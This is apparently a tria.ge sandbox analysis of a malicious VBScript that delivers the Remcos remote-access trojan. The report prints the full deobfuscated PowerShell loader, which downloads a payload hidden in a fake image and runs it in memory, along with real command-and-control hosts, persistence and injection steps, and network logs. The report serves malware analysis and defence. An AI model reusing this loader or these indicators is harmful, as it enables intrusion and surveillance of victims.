Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/12/2024, 13:32 UTC

General

  • Target

    BBVAS.A..vbs

  • Size

    167KB

  • MD5

    3c217b6a70e1ff5e6ecb71ca0e89644a

  • SHA1

    d158bcee429368797c22f4c2f9a305c2ff37beae

  • SHA256

    4e66fdbc38893f545b9088331861312e46e612bc9f4f96a9c88b286588680bf9

  • SHA512

    38bb4918e229bb83c0f7f4f3ca086253f22197f44887f81dbe4aad019811b91799bc9206155c99906855372cdc0eb09f778913d8d2b59423c3b5e550585672db

  • SSDEEP

    1536:groJZFpjN3Z5cpeYTXOnBodK/fI81ltCwKoAVTmT2xc1k3TjSjjXuw7dk+aojwE3:grorj9Z5ccYKKIIyScjXx7dk+aojD

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
$concessionaries = "aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow=="
3
$neurologically = "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$unmaternally = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$badminton = New-Object System.Net.WebClient;$roadmaker = $badminton.DownloadData($unmaternally);$Pisces = [System.Text.Encoding]::UTF8.GetString($roadmaker);$caprificus = '<<BASE64_START>>';$birthers = '<<BASE64_END>>';$disposedly = $Pisces.IndexOf($caprificus);$picture = $Pisces.IndexOf($birthers);$disposedly -ge 0 -and $picture -gt $disposedly;$disposedly += $caprificus.Length;$beefsteak = $picture - $disposedly;$retaping = $Pisces.Substring($disposedly, $beefsteak);$directions = -join ($retaping.ToCharArray() | ForEach-Object { $_ })[-1..-($retaping.Length)];$beild = [System.Convert]::FromBase64String($directions);$lowercased = [System.Reflection.Assembly]::Load($beild);$roomily = [dnlib.IO.Home].GetMethod('VAI');$roomily.Invoke($null, @('0/PXrUI/r/ee.etsap//:sptth', 'mudweed', 'mudweed', 'mudweed', 'aspnet_compiler', 'mudweed','mudweed','mudweed','haematachometer', 'C:\\ProgramData\\','haematachometer','vbs','1','1','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
4
invoke-expression "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$unmaternally = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$badminton = New-Object System.Net.WebClient;$roadmaker = $badminton.DownloadData($unmaternally);$Pisces = [System.Text.Encoding]::UTF8.GetString($roadmaker);$caprificus = '<<BASE64_START>>';$birthers = '<<BASE64_END>>';$disposedly = $Pisces.IndexOf($caprificus);$picture = $Pisces.IndexOf($birthers);$disposedly -ge 0 -and $picture -gt $disposedly;$disposedly += $caprificus.Length;$beefsteak = $picture - $disposedly;$retaping = $Pisces.Substring($disposedly, $beefsteak);$directions = -join ($retaping.ToCharArray() | ForEach-Object { $_ })[-1..-($retaping.Length)];$beild = [System.Convert]::FromBase64String($directions);$lowercased = [System.Reflection.Assembly]::Load($beild);$roomily = [dnlib.IO.Home].GetMethod('VAI');$roomily.Invoke($null, @('0/PXrUI/r/ee.etsap//:sptth', 'mudweed', 'mudweed', 'mudweed', 'aspnet_compiler', 'mudweed','mudweed','mudweed','haematachometer', 'C:\\ProgramData\\','haematachometer','vbs','1','1','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
5
6
# powershell snippet 1
7
if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) {
8
[void]$psversiontable.psversion
9
} else {
10
write-output "PowerShell version Not available"
11
}
12
if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) {
13
[void]$psversiontable.psversion
14
} else {
15
write-output "PowerShell version Not available"
16
}
17
$unmaternally = "https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg"
18
$badminton = new-object system.net.webclient
19
$roadmaker = $badminton.downloaddata("https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg")
20
$pisces = ([system.text.encoding]::ascii).getstring($roadmaker)
URLs
ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg

Extracted

Family

remcos

Botnet

NEW

C2

rem.pushswroller.eu:23101

firewarzone.ydns.eu:23101

sun.drillmmcsnk.eu:23101

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmcghghyrtssxr-7RL1P2

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BBVAS.A..vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3532
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs"
        3⤵
          PID:1752
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          3⤵
            PID:1716
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:636
      • C:\Windows\system32\wscript.exe
        wscript.exe C:\ProgramData\haematachometer.vbs
        1⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4804
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
          2⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:404
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            3⤵
              PID:3728
        • C:\Windows\system32\wscript.exe
          wscript.exe C:\ProgramData\haematachometer.vbs
          1⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1216
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1824

        Network

        • flag-us
          DNS
          paste.rs
          wscript.exe
          Remote address:
          8.8.8.8:53
          Request
          paste.rs
          IN A
          Response
          paste.rs
          IN A
          45.63.94.214
        • flag-us
          DNS
          8.8.8.8.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          8.8.8.8.in-addr.arpa
          IN PTR
          Response
          8.8.8.8.in-addr.arpa
          IN PTR
          dnsgoogle
        • flag-us
          DNS
          214.94.63.45.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          214.94.63.45.in-addr.arpa
          IN PTR
          Response
          214.94.63.45.in-addr.arpa
          IN PTR
          sergiobz
        • flag-us
          DNS
          28.118.140.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          28.118.140.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          61.45.26.184.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          61.45.26.184.in-addr.arpa
          IN PTR
          Response
          61.45.26.184.in-addr.arpa
          IN PTR
          a184-26-45-61deploystaticakamaitechnologiescom
        • flag-us
          DNS
          172.210.232.199.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          172.210.232.199.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          23.159.190.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          23.159.190.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          95.221.229.192.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          95.221.229.192.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          res.cloudinary.com
          powershell.exe
          Remote address:
          8.8.8.8:53
          Request
          res.cloudinary.com
          IN A
          Response
          res.cloudinary.com
          IN CNAME
          ion.cloudinary.com.edgekey.net
          ion.cloudinary.com.edgekey.net
          IN CNAME
          e1315.dsca.akamaiedge.net
          e1315.dsca.akamaiedge.net
          IN A
          184.26.132.41
        • flag-us
          DNS
          41.132.26.184.in-addr.arpa
          Remote address:
